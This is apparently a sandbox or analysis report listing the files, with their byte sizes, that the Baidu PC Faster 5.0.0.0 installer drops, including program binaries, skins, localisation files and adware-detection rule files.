%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10032.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SonyEric_off.png (626 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\cloudy.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\DeepOptimization\res\res.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\EnumModules.exe (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Gionee_on.png (620 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Antivirus\res\res.bskin (6360 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\nsis_install\nsis_install.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Nokia_on.png (522 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\confirm\confirm.bskin (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\sqlite.dll (20416 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1090.DVDVideoSoftToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1131.SocialSearchBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1153.TubeDimmer.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\screensnpashot\screensnpashot.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\InternetHelper.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1048.MixiDjV30.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\tools\FasterNow\FasterNow.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Communication.dll (11048 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1095.DigiModeToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0032.FreeMouseAutoClicker.rul (457 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1168.LessTabs.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\config.ini (73 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFApiUtil.sys (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\BaiduSafe\BaiduSafe.bskin (7192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\GameFaster\handle.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1115.Qwiklinx.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\DafaultPhone_on.png (397 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BaiduStore.dll (35784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1195.WProtectManager.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1170.Alawar_Ask_brch.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\fast_small_circel.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1114.ST-Eng7.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1065.DeltaToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\plugins.xml (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1175.SySaver.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1127.BSPlayerControlBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1099.SearchDeals.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\fast_big_animate.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\oovoo.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\res\res.bskin (6584 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10886.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1117.RewardsArcade.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\rainy.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1124.MagicDesktopENToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10067.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\screensnpashot\screensnpashot.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1047.A180Darts.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_homepage\skin_homepage.bskin (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1094.BittorrentBar_DEToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1155.CouponChaser.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1187.Strongvault.rul (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11452.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1085.facesmooch.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DataReport.dll (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\CP.dll (22192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1187.Strongvault.rul (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1046.appbario12.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\BaiduSafe\BaiduSafe.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\SearchAmong.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1167.KingTranslate.rul (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\NewFeatures\NewFeatures.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1099.SearchDeals.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\NEC_on.png (484 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\common\common.bskin (374 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1163.BubbleDock.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1081.Funmoods.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\BBK_off.png (476 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1045.AccuWeather.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\DafaultPC_off.png (376 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1130.PhotoJoyBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Yulong_off.png (582 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1070.IMVUToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\EnumModules.exe (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1111.Vuze.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Alcatel_off.png (453 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\NewFeatures\NewFeatures.bskin (16944 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1168.LessTabs.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\NewFeatures.ini (393 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1116.NewVeoh.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\sunny.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0005.TornTV.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\InternetHelper.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1165.SavingsScout.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1164.RecordChecker.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\foggy.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1196.V9Toolbar.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\fast_small_animate.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1179.FilesFrogUpdateChecker.rul (765 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1108.SmartSuggestor.rul (256 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1166.SpyAlert.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_webclient\skin_webclient.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\url.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\log64.dll (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\11.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1124.MagicDesktopENToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1045.AccuWeather.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1172.AskPartnerNetwork.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1118.A2ZLyrics.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10549.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Deal Spy.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\BugReporter\BugReporter.bskin (971 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1197.Desk365.rul (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\System.dll (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\data\mn.dat (962 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\ieprotect_font\ieprotect_font.bskin (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\14.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\TCL_on.png (489 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1072.MyHomepage.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Deals.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\OPPO_off.png (454 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10134.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1095.DigiModeToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\appbario7.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1138.MapsBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\download_circle.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\searchya.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\NewUpdater.exe (15536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\VidSaver.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1062.OnlineRadioPlayerRecorderToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\NSISInstall.exe (51087 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1077.BrowserCompanion.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\12.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\BugReporter\BugReporter.bskin (980 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SONY_off.png (586 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Gionee_off.png (562 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Baidu PC Faster\Uninstall.lnk (957 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\CouponCompanion.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Deals.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFasterSvc.exe (26688 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1130.PhotoJoyBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0017.USBGuardian.rul (418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\LogReporter.exe (23424 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\rainy.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.HomeEx\Plugin_HomeEx.dll (44462 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\PluginHome\rocket.bskin (13368 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\clock_hand.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\snetcfg.exe (4784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\t3.db (470 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1127.BSPlayerControlBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DataFileVer.xml (303 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1133.Mp3TubeToolbar.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\common\common.bskin (387 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1157.AppsHat.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HipsPop.exe (11344 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1141.GameMasterToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\85Play_Games.rul (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Baidu PC Faster\Baidu PC Faster.lnk (974 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SHARP_on.png (591 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11321.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1153.TubeDimmer.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1089.DVDVideoSoftToolbar.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1170.Alawar_Ask_brch.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFApiUtil64.sys (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\BugReporter\BugReporter.bskin (970 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\sqlite.dll (20416 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DirectUI.dll (67497 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SHARP_off.png (532 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Bhbase.sys (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\IWantThis.rul (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1047.A180Darts.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1053.SupremeSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SONY_on.png (619 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\MainFrame\splash_light.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1054.CouponCaddy.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10041.png (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1101.VAFMusic.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\sound\clean.wav (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\7.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1176.AutoLyrics.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1113.SpyGuard.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1102.FastFreeConverter.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\map_ID.png (8184 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1139.RecipesBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\lang.ini (94 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10945.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\map_TH.png (8560 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFPopups.exe (68799 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1112.SaveValet.rul (465 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1052.TigerSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1117.RewardsArcade.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1126.Hao123SearchRemovalTool.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1161.Linksicle.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\bk_uploading.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\sunny.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\MixiDJ.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\NewFeatures.exe (18424 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\confirm\confirm.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1087.MediaFinder.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_popup\skin_popup.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\t1.db (19096 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\sound\update.wav (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\config.ini (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\ShoppingSidekick.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\uTorrentBar.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1098.NewYorkYankeesToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\MixiDJ.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\skin_update\skin_update.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1068.AppBario2.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1188.InfoAtoms.rul (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\string.ini (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1178.IminentToolbar.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\SdkConfig.ini (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\OPPO_on.png (453 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1141.GameMasterToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\4.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1065.DeltaToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\MyWebSearch.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1176.AutoLyrics.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1057.TrustWorthy.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1195.WProtectManager.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\RebateInformer.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1057.TrustWorthy.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1060.LuckySavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10192.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optrec.6.1.def.db (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\apple_on.png (520 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1167.KingTranslate.rul (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1129.HamInfoBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\snow.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\t2.db (8184 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\NewFeatures\NewFeatures.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\screensnpashot\screensnpashot.bskin (970 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SonyEric_on.png (673 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1189.JollyWallet.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update_config.xml (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dbghelp.dll (33877 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1121.KeyBar.rul (784 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Baidu PC Faster\Uninstall.lnk (957 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\BaiduSafe\BaiduSafe.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0013.FreeKeylogger.rul (237 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HipsHp.dll (27704 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\tools\FasterNow\FasterNow.bskin (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Dealio.rul.bak (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Huawei_on.png (697 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1082.PricePeep.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optrec.6.0.def.db (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\InstallCheck.dll (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10535.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0014.Smadav96.rul (722 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\common\common.bskin (395 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1122.Mysearchdial.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BEVMApi001.dll (13368 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1067.SearchAssistant.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\confirm\confirm.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\CloudOPTClient.exe (32128 bytes)
